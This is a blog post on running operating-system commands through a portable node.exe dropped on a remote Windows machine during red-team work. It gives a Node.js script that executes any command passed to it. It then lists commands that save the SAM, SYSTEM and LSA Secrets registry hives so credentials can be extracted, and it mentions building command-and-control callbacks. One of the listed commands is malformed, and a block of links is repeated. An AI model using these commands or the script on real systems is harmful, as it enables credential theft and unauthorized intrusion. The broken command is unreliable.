Was exploring Node.js and thought to publish article here on how we can leverage Node.js in pentesting.
I saw few articles of Malware's targeting some of the organizations in USA and UK are using Node.js in their attacks. Seems its really interesting idea to explore how we can leverage this in our Red Teams!
Quick Introduction on Node.js
1. Its an open source JavaScript run time environment
2. In a simple words, its a server side JavaScript programming language
3. Node.js gives you access to its API which can control system.
Similar to other programming languages, you can Create, Read, Modify files, access OS etc.
For complete list of API refer - https://nodejs.org/docs/latest-v13.x/api/
1. Install Node.js on windows
2. Post installation you can access it with 'node' command
3. In Node console we can execute node commands
Now for Pen-testers, we don't have to install Node.js on remote system we can always carry portable node.exe file and drop it in remote system. ( I don't have to tell you where to get Node.exe, You can figure out yourself! )
Here is the code which we can use for executing OS commands via Node.js API.
var myArgs = process.argv.slice(2);
const { exec } = require("child_process");
exec(myArgs, (error, stdout, stderr) => {
if (error) {
console.log(`error: ${error.message}`);
return;
}
if (stderr) {
console.log(`stderr: ${stderr}`);
return;
}
console.log(`stdout: ${stdout}`);
});
Executing OS commands via Node.js |
Now we can pass on following important commands as well,
1. node.exe file.js "reg save HKLM\SAM c:\SAM"
2. node.exe file.js "reg save HKLM\SYSTEM c:\SYSTEM"
3. node.exe file.js "HKEY_LOCAL_MACHINE\Security\Policy\Secrets c:\lsa"
This is just one way of executing OS commands via portable Node.exe
Lot more things can be done with this, even a simple Command and control code which will call back your web server and fetch commands or Web server using nodejs which we can use for accessing victim files!
There were instances of Malware's codes containing hard coded nodejs links for downloading Node.exe
https://nodejs.org/dist/latest-v10.x/win-x86/
Here is the good article on Malware's using Node.js :
https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/
There were instances of Malware's codes containing hard coded nodejs links for downloading Node.exe
https://nodejs.org/dist/latest-v10.x/win-x86/
Here is the good article on Malware's using Node.js :
https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/
No comments:
Post a Comment